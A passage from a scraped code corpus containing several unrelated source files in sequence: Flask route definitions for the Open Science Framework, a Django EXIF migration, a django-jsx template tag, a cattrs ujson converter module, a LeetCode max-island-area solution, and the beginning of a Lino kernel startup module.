json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', ['get', 'post'], search_views.search_share, json_renderer),
Rule('/share/stats/', 'get', search_views.search_share_stats, json_renderer),
Rule('/share/providers/', 'get', search_views.search_share_providers, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
# '/' route loads home.mako if logged in, otherwise loads landing.mako
Rule('/', 'get', website_views.index, OsfWebRenderer('index.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, OsfWebRenderer('landing.mako', trust=False)),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
# # TODO: Add API endpoint for tags
# Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, OsfWebRenderer('tags.mako', trust=False)),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
### Logs ###
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
OsfWebRenderer('project/forks.mako', trust=False)
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
# Statistics
Rule(
[
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
],
'get',
project_views.node.project_statistics_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
OsfWebRenderer('project/statistics.mako', trust=False)
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
#api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/pointers/move/',
],
'post',
project_views.node.move_pointers,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
Rule(
[
'/folder/<pid>/pointer/<pointer_id>',
],
'delete',
project_views.node.remove_pointer_from_folder,
json_renderer,
),
Rule([
'/project/<pid>/get_summary/',
'/project/<pid>/node/<nid>/get_summary/',
], 'get', project_views.node.get_summary, json_renderer),
Rule([
'/project/<pid>/get_children/',
'/project/<pid>/node/<nid>/get_children/',
], 'get', project_views.node.get_children, json_renderer),
Rule([
'/project/<pid>/get_forks/',
'/project/<pid>/node/<nid>/get_forks/',
], 'get', project_views.node.get_forks, json_renderer),
Rule([
'/project/<pid>/get_registrations/',
'/project/<pid>/node/<nid>/get_registrations/',
], 'get', project_views.node.get_registrations, json_renderer),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule('/log/<log_id>/', 'get', project_views.log.get_log, json_renderer),
Rule([
'/project/<pid>/log/',
'/project/<pid>/node/<nid>/log/',
], 'get', project_views.log.get_logs, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/fork/',
'/project/<pid>/node/<nid>/fork/',
], 'post', project_views.node.node_fork_page, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# View forks
Rule([
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
], 'get', project_views.node.node_forks, json_renderer),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
'/project/<pid>/node/<nid>/beforeregister',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/register/<template>/',
'/project/<pid>/node/<nid>/register/<template>/',
], 'get', project_views.register.node_register_template_page, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'get',
project_views.register.node_identifiers_get,
json_renderer,
),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
project_views.register.node_identifiers_post,
json_renderer,
),
# Statistics
Rule([
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
], 'get', project_views.node.project_statistics, json_renderer),
# Permissions
Rule([
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
], 'post', project_views.node.project_set_privacy, json_renderer),
Rule([
'/project/<pid>/permissions/beforepublic/',
'/project/<pid>/node/<nid>/permissions/beforepublic/',
], 'get', project_views.node.project_before_set_public, json_renderer),
### Watching ###
Rule([
'/project/<pid>/watch/',
'/project/<pid>/node/<nid>/watch/'
], 'post', project_views.node.watch_post, json_renderer),
Rule([
'/project/<pid>/unwatch/',
'/project/<pid>/node/<nid>/unwatch/'
], 'post', project_views.node.unwatch_post, json_renderer),
Rule([
'/project/<pid>/togglewatch/',
'/project/<pid>/node/<nid>/togglewatch/'
], 'post', project_views.node.togglewatch_post, json_renderer),
Rule([
'/watched/logs/'
], 'get', website_views.watched_logs_get, json_renderer),
### Accounts ###
Rule([
'/user/merge/'
], 'post', auth_views.merge_user_post, json_renderer),
# Combined files
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/'
],
'get',
project_views.file.collect_file_trees,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('website/addons')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
| apache-2.0 | -6,358,533,792,708,472,000 | 30.363971 | 139 | 0.503575 | false |
mistakes-consortium/igng | images/migrations/0003_auto_20141207_1907.py | 1 | 1867 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('images', '0002_auto_20141201_0515'),
]
operations = [
migrations.CreateModel(
name='EXIFEntry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExifKey',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('key', models.CharField(max_length=64)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExifValue',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.CharField(max_length=64)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='exifentry',
name='key',
field=models.ForeignKey(to='images.ExifKey'),
preserve_default=True,
),
migrations.AddField(
model_name='exifentry',
name='value',
field=models.ForeignKey(to='images.ExifValue'),
preserve_default=True,
),
migrations.AddField(
model_name='image',
name='exif_data',
field=models.ManyToManyField(to='images.EXIFEntry', null=True, blank=True),
preserve_default=True,
),
]
| bsd-3-clause | 8,179,612,341,216,877,000 | 29.606557 | 114 | 0.50616 | false |
jonashagstedt/django-jsx | django_jsx/templatetags/djangojs.py | 1 | 1185 | from django import template
from django.conf import settings
from django_jsx.template.backend import JsTemplate
from django_jsx.template.loaders import JsLoader
register = template.Library()
loader = JsLoader(engine=None)
class JsMissingTemplateDirException(Exception):
pass
def _get_template_dirs():
for t in settings.TEMPLATES:
if t['BACKEND'] == 'django_jsx.template.backend.JsTemplates':
return t['DIRS']
return None
def _get_template_path(template_name):
template_dirs = _get_template_dirs()
if not template_dirs:
return None
template_path, _ = loader.load_template(template_name, template_dirs=template_dirs)
return template_path
@register.simple_tag(takes_context=True)
def include_js(context, template_name, **kwargs):
request = context.get('request')
template_path = _get_template_path(template_name)
if not template_path:
raise JsMissingTemplateDirException('No template directory')
template = JsTemplate(template_path)
template_context = context.flatten()
template_context.update(kwargs)
context.update(kwargs)
return template.render(template_context, request=request)
| bsd-3-clause | -1,721,959,321,510,596,600 | 29.384615 | 87 | 0.729114 | false |
Tinche/cattrs | src/cattr/preconf/ujson.py | 1 | 1075 | """Preconfigured converters for ujson."""
from base64 import b85decode, b85encode
from datetime import datetime
from .._compat import Set
from ..converters import Converter, GenConverter
def configure_converter(converter: Converter):
"""
Configure the converter for use with the ujson library.
* bytes are serialized as base64 strings
* datetimes are serialized as ISO 8601
* sets are serialized as lists
"""
converter.register_unstructure_hook(
bytes, lambda v: (b85encode(v) if v else b"").decode("utf8")
)
converter.register_structure_hook(bytes, lambda v, _: b85decode(v))
converter.register_unstructure_hook(datetime, lambda v: v.isoformat())
converter.register_structure_hook(
datetime, lambda v, _: datetime.fromisoformat(v)
)
def make_converter(*args, **kwargs) -> GenConverter:
kwargs["unstruct_collection_overrides"] = {
**kwargs.get("unstruct_collection_overrides", {}),
Set: list,
}
res = GenConverter(*args, **kwargs)
configure_converter(res)
return res
| mit | -6,053,782,135,831,855,000 | 28.861111 | 74 | 0.689302 | false |
bowen0701/algorithms_data_structures | lc0695_max_area_of_island.py | 1 | 4625 | """Leetcode 695. Max Area of Island
Medium
URL: https://leetcode.com/problems/max-area-of-island/
Given a non-empty 2D array grid of 0's and 1's, an island is a group of 1's
(representing land) connected 4-directionally (horizontal or vertical.)
You may assume all four edges of the grid are surrounded by water.
Find the maximum area of an island in the given 2D array.
(If there is no island, the maximum area is 0.)
Example 1:
[[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
Given the above grid, return 6. Note the answer is not 11,
because the island must be connected 4-directionally.
Example 2:
[[0,0,0,0,0,0,0,0]]
Given the above grid, return 0.
Note: The length of each dimension in the given grid does not exceed 50.
"""
class SolutionDFSRecurUpdate(object):
def _dfs(self, r, c, grid):
# Check exit conditions: out of boundaries, in water.
if (r < 0 or r >= len(grid) or c < 0 or c >= len(grid[0]) or
grid[r][c] == 0):
return 0
# Mark (r, c) as visited.
grid[r][c] = 0
area = 1
# Visit 4 directions to accumulate area.
dirs = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]
for r_next, c_next in dirs:
area += self._dfs(r_next, c_next, grid)
return area
def maxAreaOfIsland(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
Time complexity: O(m*n).
Space complexity: O(m*n).
"""
if not grid or not grid[0]:
return 0
max_area = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == 1:
area = self._dfs(r, c, grid)
max_area = max(max_area, area)
return max_area
class SolutionDFSIterUpdate(object):
def _get_tovisit_ls(self, v_start, grid):
r, c = v_start
tovisit_ls = []
# Visit up, down, left and right.
dirs = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]
for r_next, c_next in dirs:
if (0 <= r_next < len(grid) and
0 <= c_next < len(grid[0]) and
grid[r_next][c_next] == 1):
tovisit_ls.append((r_next, c_next))
return tovisit_ls
def _dfs(self, r, c, grid):
grid[r][c] = 0
# Use stack for DFS.
stack = [(r, c)]
area = 1
while stack:
# Get to-visit nodes from the top of stack.
tovisit_ls = self._get_tovisit_ls(stack[-1], grid)
if tovisit_ls:
for r_next, c_next in tovisit_ls:
grid[r_next][c_next] = 0
area += 1
stack.append((r_next, c_next))
# Break to continue DFS.
break
else:
stack.pop()
return area
def maxAreaOfIsland(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
Time complexity: O(m*n).
Space complexity: O(m*n).
"""
if not grid or not grid[0]:
return 0
max_area = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == 1:
area = self._dfs(r, c, grid)
max_area = max(max_area, area)
return max_area
def main():
# Output: 6
grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
print SolutionDFSRecurUpdate().maxAreaOfIsland(grid)
grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
print SolutionDFSIterUpdate().maxAreaOfIsland(grid)
# Output: 0.
grid = [[0,0,0,0,0,0,0,0]]
print SolutionDFSRecurUpdate().maxAreaOfIsland(grid)
grid = [[0,0,0,0,0,0,0,0]]
print SolutionDFSIterUpdate().maxAreaOfIsland(grid)
if __name__ == '__main__':
main()
| bsd-2-clause | -5,161,163,467,805,236,000 | 27.20122 | 75 | 0.48627 | false |
MaxTyutyunnikov/lino | lino/core/kernel.py | 1 | 12433 | # -*- coding: UTF-8 -*-
## Copyright 2009-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
import os
import sys
#~ import imp
import codecs
import atexit
#~ import collections
from UserDict import IterableUserDict
from django.db.models import loading
from django.conf import settings
from django.utils.importlib import import_module
from django.utils.functional import LazyObject
from django.db import models
#from django.shortcuts import render_to_response
#from django.contrib.auth.models import User
from django.contrib.contenttypes import generic
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.sites.models import Site, RequestSite
from django.http import HttpResponse,HttpResponseRedirect, Http404
from django.template import RequestContext, Context, loader
from django.utils.http import urlquote, base36_to_int
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
import lino
from lino import dd
#~ from lino.core import signals
#~ from lino.core import actions
from lino.core import fields
from lino.core import layouts
from lino.core import actors
from lino.core import actions
from lino.core import dbtables
from lino.utils import class_dict_items
#~ from lino.utils.config import load_config_files, find_config_file
#~ from lino.utils import choosers
#~ from lino.utils import codetime
from lino.utils import curry
#~ from lino.models import get_site_config
#~ from north import babel
from lino.utils import AttrDict
#~ from lino.core import perms
#~ BLANK_STATE = ''
#~ DONE = False
#~ self.GFK_LIST = []
def set_default_verbose_name(f):
"""
If the verbose_name of a ForeignKey was not set by user code,
Django sets it to ``field.name.replace('_', ' ')``.
We replace this default value by ``f.rel.to._meta.verbose_name``.
This rule holds also for virtual FK fields.
"""
if f.verbose_name == f.name.replace('_', ' '):
f.verbose_name = f.rel.to._meta.verbose_name
#~ def shutdown_site(self):
#~ models_list = models.get_models(include_auto_created=True)
#~ for m in models_list:
#~ ...
def startup_site(self):
"""
This is the code that runs when you call :meth:`lino.site.Site.startup`.
This is a part of a Lino site setup.
The Django Model definitions are done, now Lino analyzes them and does certain actions.
- Verify that there are no more pending injects
- Install a DisableDeleteHandler for each Model into `_lino_ddh`
- Install :class:`lino.dd.Model` attributes and methods into Models that
don't inherit from it.
"""
if len(sys.argv) == 0:
process_name = 'WSGI'
else:
process_name = ' '.join(sys.argv)
#~ logger.info("Started %s on %r (PID %s).", process_name,self.title,os.getpid())
logger.info("Started %s (using %s) --> PID %s",
process_name,settings.SETTINGS_MODULE,os.getpid())
logger.info(self.welcome_text())
def goodbye():
logger.info("Done %s (PID %s)",process_name,os.getpid())
atexit.register(goodbye)
#~ analyze_models(self)
#~ print 20130219, __file__, "setup_choicelists 1"
#~ logger.info("Analyzing models...")
#~ self = settings.SITE
#~ logger.info(self.welcome_text())
#~ """
#~ Activate the site's default language
#~ """
#~ dd.set_language(None)
#~ logger.info(lino.welcome_text())
#~ raise Exception("20111229")
models_list = models.get_models(include_auto_created=True)
# this also triggers django.db.models.loading.cache._populate()
if self.user_model:
self.user_model = dd.resolve_model(self.user_model,
strict="Unresolved model '%s' in user_model.")
#~ if self.person_model:
#~ self.person_model = dd.resolve_model(self.person_model,strict="Unresolved model '%s' in person_model.")
#~ print 20130219, __file__, "setup_choicelists 2"
if self.project_model:
self.project_model = dd.resolve_model(self.project_model,
strict="Unresolved model '%s' in project_model.")
#~ print 20130219, __file__, "setup_choicelists 3"
for m in self.override_modlib_models:
dd.resolve_model(m,
strict="Unresolved model '%s' in override_modlib_models.")
for model in models_list:
#~ print 20130216, model
#~ fix_field_cache(model)
model._lino_ddh = DisableDeleteHandler(model)
for k in dd.Model.LINO_MODEL_ATTRIBS:
if not hasattr(model,k):
#~ setattr(model,k,getattr(dd.Model,k))
setattr(model,k,dd.Model.__dict__[k])
#~ model.__dict__[k] = getattr(dd.Model,k)
#~ logger.info("20121127 Install default %s for %s",k,model)
if isinstance(model.hidden_columns,basestring):
model.hidden_columns = frozenset(dd.fields_list(model,model.hidden_columns))
if model._meta.abstract:
raise Exception("Tiens?")
self.modules.define(model._meta.app_label,model.__name__,model)
for f in model._meta.virtual_fields:
if isinstance(f,generic.GenericForeignKey):
settings.SITE.GFK_LIST.append(f)
for a in models.get_apps():
#~ for app_label,a in loading.cache.app_store.items():
app_label = a.__name__.split('.')[-2]
